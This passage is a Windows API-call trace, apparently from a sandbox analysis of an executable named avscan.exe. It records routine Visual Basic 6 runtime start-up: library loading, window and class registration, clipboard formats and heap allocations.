out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe.cfg") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe.cfg" [0134.994] SetLastError (dwErrCode=0x0) [0134.994] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x28f7f4, lpFilePart=0x28f7c8 | out: lpBuffer="\x0cú(", lpFilePart=0x28f7c8*="\x8bÿU\x8bì\x83ì\x14S\x8b]\x0cV\x8bs\x0835¬\x03¶uW\x8b\x06ÆEÿ") returned 0x0 [0134.994] SetLastError (dwErrCode=0x2) [0134.994] GetLastError () returned 0x2 [0134.994] lstrcmpiA (lpString1="avscan", lpString2="MTX") returned -1 [0134.994] lstrcmpiA (lpString1="avscan", lpString2="DLLHOST") returned -1 [0134.994] lstrcmpiA (lpString1="avscan", lpString2="INETINFO") returned -1 [0134.995] lstrcmpiA (lpString1="avscan", lpString2="W3WP") returned -1 [0134.995] lstrcmpiA (lpString1="avscan", lpString2="ASPNET_WP") returned 1 [0134.995] lstrcmpiA (lpString1="avscan", lpString2="DLLHST3G") returned -1 [0134.995] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f8ec, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0134.995] lstrcmpiA (lpString1="avscan", lpString2="IEXPLORE") returned -1 [0134.995] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="SXS.DLL", cbMultiByte=7, lpWideCharStr=0x28eb88, cchWideChar=2047 | out: lpWideCharStr="SXS.DLLDLL") returned 7 [0134.995] SysReAllocStringLen (in: pbstr=0x28fb8c*=0x0, psz="SXS.DLL", len=0x7 | out: pbstr=0x28fb8c*="SXS.DLL") returned 1 [0134.996] CharLowerBuffW (in: lpsz="SXS.DLL", cchLength=0x7 | out: lpsz="sxs.dll") returned 0x7 [0134.996] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x72ec0000 [0135.551] GetLastError () returned 0x0 [0135.551] SetLastError (dwErrCode=0x0) [0135.551] GetLastError () returned 0x0 [0135.551] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x72f07685 [0135.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x28fe38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0135.552] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x1c) returned 0x10d2050 [0135.552] CoRegisterMessageFilter (in: lpMessageFilter=0x10d2054, lplpMessageFilter=0x10d205c | out: lplpMessageFilter=0x10d205c*=0x0) returned 0x0 [0135.552] IUnknown:AddRef (This=0x10d2054) returned 0x2 [0135.552] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x28fe08 | out: lpwcx=0x28fe08) returned 0 [0135.553] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x1101a5 [0135.554] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="USER32", cbMultiByte=6, lpWideCharStr=0x28eda0, cchWideChar=2047 | out: lpWideCharStr="USER32ምCᭈ̷(በC︬(\x0c") returned 6 [0135.554] SysReAllocStringLen (in: pbstr=0x28fda4*=0x0, psz="USER32", len=0x6 | out: pbstr=0x28fda4*="USER32") returned 1 [0135.554] CharLowerBuffW (in: lpsz="USER32", cchLength=0x6 | out: lpsz="user32") returned 0x6 [0135.555] GetModuleHandleA (lpModuleName="USER32") returned 0x75980000 [0135.555] GetProcAddress (hModule=0x75980000, lpProcName="GetSystemMetrics") returned 0x75997d2f [0135.556] GetProcAddress (hModule=0x75980000, lpProcName="MonitorFromWindow") returned 0x759a3150 [0135.556] GetProcAddress (hModule=0x75980000, lpProcName="MonitorFromRect") returned 0x759be7a0 [0135.556] GetProcAddress (hModule=0x75980000, lpProcName="MonitorFromPoint") returned 0x759a5281 [0135.556] GetProcAddress (hModule=0x75980000, lpProcName="EnumDisplayMonitors") returned 0x759a451a [0135.557] GetProcAddress (hModule=0x75980000, lpProcName="GetMonitorInfoA") returned 0x759a4413 [0135.557] GetSystemMetrics (nIndex=0) returned 1440 [0135.557] GetSystemMetrics (nIndex=78) returned 1440 [0135.557] GetSystemMetrics (nIndex=1) returned 900 [0135.557] GetSystemMetrics (nIndex=79) returned 900 [0135.557] GetSystemMetrics (nIndex=50) returned 16 [0135.557] GetSystemMetrics (nIndex=49) returned 16 [0135.557] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0xd0357 [0135.558] RegisterClassExA (param_1=0x28fe08) returned 0x11c1c2 [0135.558] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x60066 [0135.560] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x81, wParam=0x0, lParam=0x28f9ec) returned 0x1 [0135.563] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x83, wParam=0x0, lParam=0x28f9d8) returned 0x0 [0135.563] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x1, wParam=0x0, lParam=0x28f9ec) returned 0x0 [0135.564] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0135.564] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0135.564] MonitorFromWindow (hwnd=0x60066, dwFlags=0x2) returned 0x10001 [0135.564] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x28fe10 | out: lpmi=0x28fe10) returned 1 [0135.564] SetWindowPos (hWnd=0x60066, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0135.565] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x46, wParam=0x0, lParam=0x28fdb0) returned 0x0 [0135.566] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x47, wParam=0x0, lParam=0x28fdb0) returned 0x0 [0135.566] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0135.567] ShowWindow (hWnd=0x60066, nCmdShow=4) returned 0 [0135.567] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0135.567] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x46, wParam=0x0, lParam=0x28fdc4) returned 0x0 [0135.568] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x47, wParam=0x0, lParam=0x28fdc4) returned 0x0 [0135.568] GetWindowThreadProcessId (in: hWnd=0x60066, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xfd8 [0135.568] VirtualQuery (in: lpAddress=0x28fe38, lpBuffer=0x28fe1c, dwLength=0x1c | out: lpBuffer=0x28fe1c*(BaseAddress=0x28f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.569] GetUserDefaultLCID () returned 0x409 [0135.569] IsValidCodePage (CodePage=0x3a4) returned 1 [0135.569] IsValidCodePage (CodePage=0x3b5) returned 1 [0135.569] IsValidCodePage (CodePage=0x3b6) returned 1 [0135.570] IsValidCodePage (CodePage=0x3a8) returned 1 [0135.578] GetUserDefaultLangID () returned 0x409 [0135.578] GetSystemDefaultLangID () returned 0x1140409 [0135.578] GetSystemMetrics (nIndex=42) returned 0 [0135.578] IMalloc:Alloc (This=0x76da66bc, cb=0xa8) returned 0x1158c68 [0135.578] IMalloc:GetSize (This=0x76da66bc, pv=0x1158c68) returned 0xa8 [0135.578] IMalloc:Alloc (This=0x76da66bc, cb=0xc) returned 0x114eb70 [0135.578] GetCurrentThreadId () returned 0xfd8 [0135.579] IMalloc:Alloc (This=0x76da66bc, cb=0x3c) returned 0x1146f00 [0135.579] IMalloc:Alloc (This=0x76da66bc, cb=0x1c) returned 0x1159108 [0135.579] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x28fe04 | out: phkResult=0x28fe04*=0x0) returned 0x2 [0135.579] IMalloc:Alloc (This=0x76da66bc, cb=0x1c) returned 0x1159130 [0135.579] GetCurrentThreadId () returned 0xfd8 [0135.579] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0xfd8) returned 0xc0173 [0135.646] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x14) returned 0x10d2078 [0135.646] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x80) returned 0x10d2098 [0135.647] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10d2120 [0135.647] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x2c) returned 0x10d2138 [0135.647] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x28fd5c | out: lpWndClass=0x28fd5c) returned 0 [0135.647] RegisterClassA (lpWndClass=0x28fd5c) returned 0x1bc1c3 [0135.647] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x103b2 [0135.647] NtdllDefWindowProc_A (hWnd=0x103b2, Msg=0x81, wParam=0x0, lParam=0x28f998) returned 0x1 [0135.647] NtdllDefWindowProc_A (hWnd=0x103b2, Msg=0x83, wParam=0x0, lParam=0x28f984) returned 0x0 [0135.648] NtdllDefWindowProc_A (hWnd=0x103b2, Msg=0x1, wParam=0x0, lParam=0x28f998) returned 0x0 [0135.648] NtdllDefWindowProc_A (hWnd=0x103b2, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0135.648] NtdllDefWindowProc_A (hWnd=0x103b2, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0135.648] SetWindowLongA (hWnd=0x103b2, nIndex=0, dwNewLong=17637532) returned 0 [0135.648] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x38) returned 0x10d2170 [0135.649] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x18) returned 0x10d21b0 [0135.649] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10d21d0 [0135.649] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0135.649] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0135.649] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0135.649] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0135.649] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0135.649] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0135.649] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0135.650] CreateCompatibleDC (hdc=0x0) returned 0x43010b30 [0135.650] GetCurrentObject (hdc=0x43010b30, type=0x7) returned 0x185000f [0135.650] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x60066, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x103b4 [0135.650] NtdllDefWindowProc_A (hWnd=0x103b4, Msg=0x81, wParam=0x0, lParam=0x28fa28) returned 0x1 [0135.650] NtdllDefWindowProc_A (hWnd=0x103b4, Msg=0x83, wParam=0x0, lParam=0x28fa14) returned 0x0 [0135.651] NtdllDefWindowProc_A (hWnd=0x103b4, Msg=0x1, wParam=0x0, lParam=0x28fa28) returned 0x0 [0135.651] NtdllDefWindowProc_A (hWnd=0x103b4, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0135.651] NtdllDefWindowProc_A (hWnd=0x103b4, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0135.651] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x210, wParam=0x1, lParam=0x103b4) returned 0x0 [0135.651] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x18) returned 0x10d21e8 [0135.652] RtlAllocateHeap (HeapHandle=0x3b10000, Flags=0x8, Size=0x114) returned 0x3b107d0 [0135.652] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x5c) returned 0x10d2208 [0135.652] GetCurrentThreadId () returned 0xfd8 [0135.652] GetCurrentThreadId () returned 0xfd8 [0135.652] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x10) returned 0x10d2270 [0135.652] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x30) returned 0x10d2288 [0135.652] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x434) returned 0x10d22c0 [0135.653] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x434) returned 0x10d2700 [0135.653] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x3c) returned 0x10d2b40 [0135.653] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d2b88 [0135.653] lstrlenA (lpString="VB") returned 2 [0135.653] lstrlenA (lpString="PictureBox") returned 10 [0135.653] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xe) returned 0x10d2ca8 [0135.654] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x16c) returned 0x10d2cc0 [0135.654] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x68) returned 0x10d2e38 [0135.654] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x2c8) returned 0x10d2ea8 [0135.654] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x28) returned 0x10d3178 [0135.655] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d31a8 [0135.655] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x28) returned 0x10d31c8 [0135.655] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d31f8 [0135.655] lstrlenA (lpString="VB") returned 2 [0135.655] lstrlenA (lpString="TextBox") returned 7 [0135.655] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xb) returned 0x10d3318 [0135.655] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x38) returned 0x10d3330 [0135.655] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x120) returned 0x10d3370 [0135.655] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x60) returned 0x10d3498 [0135.655] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x250) returned 0x10d3500 [0135.656] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d3758 [0135.656] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d3778 [0135.656] lstrlenA (lpString="VB") returned 2 [0135.656] lstrlenA (lpString="CommandButton") returned 13 [0135.656] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x11) returned 0x10d3898 [0135.656] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x28) returned 0x10d38b8 [0135.656] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xd4) returned 0x10d38e8 [0135.656] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x44) returned 0x10d39c8 [0135.657] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x1c8) returned 0x10d3a18 [0135.657] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d3be8 [0135.657] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d3c08 [0135.657] lstrlenA (lpString="VB") returned 2 [0135.657] lstrlenA (lpString="Timer") returned 5 [0135.657] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x9) returned 0x10d3d28 [0135.657] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xc) returned 0x10d3d40 [0135.657] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x30) returned 0x10d3d58 [0135.658] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x4) returned 0x10d3d90 [0135.658] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x9c) returned 0x10d3da0 [0135.658] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d3e48 [0135.658] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d3e68 [0135.658] lstrlenA (lpString="VB") returned 2 [0135.659] lstrlenA (lpString="Printer") returned 7 [0135.659] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xb) returned 0x10d3f88 [0135.659] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xdc) returned 0x10d3fa0 [0135.659] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d4088 [0135.660] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d40a8 [0135.660] lstrlenA (lpString="VB") returned 2 [0135.660] lstrlenA (lpString="Form") returned 4 [0135.660] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x8) returned 0x10d41c8 [0135.660] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x184) returned 0x10d41d8 [0135.660] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x7c) returned 0x10d4368 [0135.660] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x2f8) returned 0x10d43f0 [0135.660] RtlReAllocateHeap (Heap=0x10d0000, Flags=0x0, Ptr=0x10d3178, Size=0x50) returned 0x10d46f0 [0135.660] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d3178 [0135.661] RtlReAllocateHeap (Heap=0x10d0000, Flags=0x0, Ptr=0x10d31c8, Size=0x50) returned 0x10d4748 [0135.661] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d47a0 [0135.661] lstrlenA (lpString="VB") returned 2 [0135.661] lstrlenA (lpString="Screen") returned 6 [0135.661] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xa) returned 0x10d31c8 [0135.661] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x2c) returned 0x10d48c0 [0135.661] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xa0) returned 0x10d48f8 [0135.661] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d49a0 [0135.662] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d49c0 [0135.662] lstrlenA (lpString="VB") returned 2 [0135.662] lstrlenA (lpString="Clipboard") returned 9 [0135.662] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xd) returned 0x10d31e0 [0135.662] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x1c) returned 0x10d4ae0 [0135.662] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x68) returned 0x10d4b08 [0135.663] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d4b78 [0135.663] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d4b98 [0135.663] lstrlenA (lpString="VB") returned 2 [0135.663] lstrlenA (lpString="MDIForm") returned 7 [0135.663] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xb) returned 0x10d4cb8 [0135.663] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x184) returned 0x10d4cd0 [0135.663] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x7c) returned 0x10d4e60 [0135.663] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x2f8) returned 0x10d4ee8 [0135.664] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d51e8 [0135.664] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d5208 [0135.664] lstrlenA (lpString="VB") returned 2 [0135.664] lstrlenA (lpString="App") returned 3 [0135.665] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x7) returned 0x10d3198 [0135.665] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x84) returned 0x10d5328 [0135.665] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x148) returned 0x10d53b8 [0135.665] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d5508 [0135.665] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d5528 [0135.665] lstrlenA (lpString="VB") returned 2 [0135.665] lstrlenA (lpString="UserControl") returned 11 [0135.666] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xf) returned 0x10d5648 [0135.666] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x1e4) returned 0x10d5660 [0135.666] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xb0) returned 0x10d5850 [0135.666] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3a4) returned 0x10d5908 [0135.666] RtlReAllocateHeap (Heap=0x10d0000, Flags=0x0, Ptr=0x10d46f0, Size=0x78) returned 0x10d5cb8 [0135.666] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d46f0 [0135.667] RtlReAllocateHeap (Heap=0x10d0000, Flags=0x0, Ptr=0x10d4748, Size=0x78) returned 0x10d5d38 [0135.667] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d5db8 [0135.667] lstrlenA (lpString="VB") returned 2 [0135.667] lstrlenA (lpString="PropertyPage") returned 12 [0135.667] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10d4710 [0135.667] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x190) returned 0x10d5ed8 [0135.667] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x88) returned 0x10d6070 [0135.668] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x310) returned 0x10d6100 [0135.668] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0135.668] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d4728 [0135.668] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10d6418 [0135.668] lstrlenA (lpString="VB") returned 2 [0135.668] lstrlenA (lpString="UserDocument") returned 12 [0135.669] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10d4748 [0135.669] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x1c8) returned 0x10d6538 [0135.669] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xa8) returned 0x10d6708 [0135.669] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x370) returned 0x10d67b8 [0135.669] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10d4760 [0135.670] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x20) returned 0x10e1398 [0135.671] RtlAllocateHeap (HeapHandle=0x3b10000, Flags=0x8, Size=0x30) returned 0x3b108f0 [0135.671] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xa0) returned 0x10e13c0 [0135.671] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x28) returned 0x10e1468 [0135.672] GetCurrentThreadId () returned 0xfd8 [0135.672] GetCurrentThreadId () returned 0xfd8 [0135.672] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x10) returned 0x10d4780 [0135.672] RtlAllocateHeap (HeapHandle=0x3b10000, Flags=0x8, Size=0x30) returned 0x3b10928 [0135.672] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xa0) returned 0x10e1498 [0135.672] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x28) returned 0x10e1540 [0135.672] GetCurrentThreadId () returned 0xfd8 [0135.672] GetCurrentThreadId () returned 0xfd8 [0135.672] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x10) returned 0x10e1570 [0135.672] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e1588 [0135.672] lstrlenA (lpString="VB") returned 2 [0135.673] lstrlenA (lpString="Label") returned 5 [0135.673] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x9) returned 0x10e16a8 [0135.673] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x34) returned 0x10e16c0 [0135.673] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xf0) returned 0x10e1700 [0135.673] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x48) returned 0x10e17f8 [0135.673] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x1f4) returned 0x10e1848 [0135.673] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e1a48 [0135.674] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e1a68 [0135.674] lstrlenA (lpString="VB") returned 2 [0135.674] lstrlenA (lpString="Frame") returned 5 [0135.674] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x9) returned 0x10e1ba0 [0135.674] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x24) returned 0x10e2388 [0135.674] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xb0) returned 0x10e23b8 [0135.674] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x34) returned 0x10e2470 [0135.674] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x184) returned 0x10e24b0 [0135.674] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2658 [0135.675] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e2e40 [0135.675] lstrlenA (lpString="VB") returned 2 [0135.675] lstrlenA (lpString="CheckBox") returned 8 [0135.675] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xc) returned 0x10e1bb8 [0135.675] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x28) returned 0x10e2f60 [0135.675] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xec) returned 0x10e2f90 [0135.675] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x48) returned 0x10e3088 [0135.675] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x1f8) returned 0x10e30d8 [0135.675] RtlReAllocateHeap (Heap=0x10d0000, Flags=0x0, Ptr=0x10d5cb8, Size=0xa0) returned 0x10e32d8 [0135.676] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2678 [0135.676] RtlReAllocateHeap (Heap=0x10d0000, Flags=0x0, Ptr=0x10d5d38, Size=0xa0) returned 0x10e3380 [0135.676] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e3428 [0135.676] lstrlenA (lpString="VB") returned 2 [0135.676] lstrlenA (lpString="OptionButton") returned 12 [0135.676] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10e1bd0 [0135.676] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x28) returned 0x10d5cb8 [0135.676] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xd4) returned 0x10e3548 [0135.676] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x4c) returned 0x10d5ce8 [0135.676] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x1c8) returned 0x10e3628 [0135.677] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2698 [0135.677] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e3810 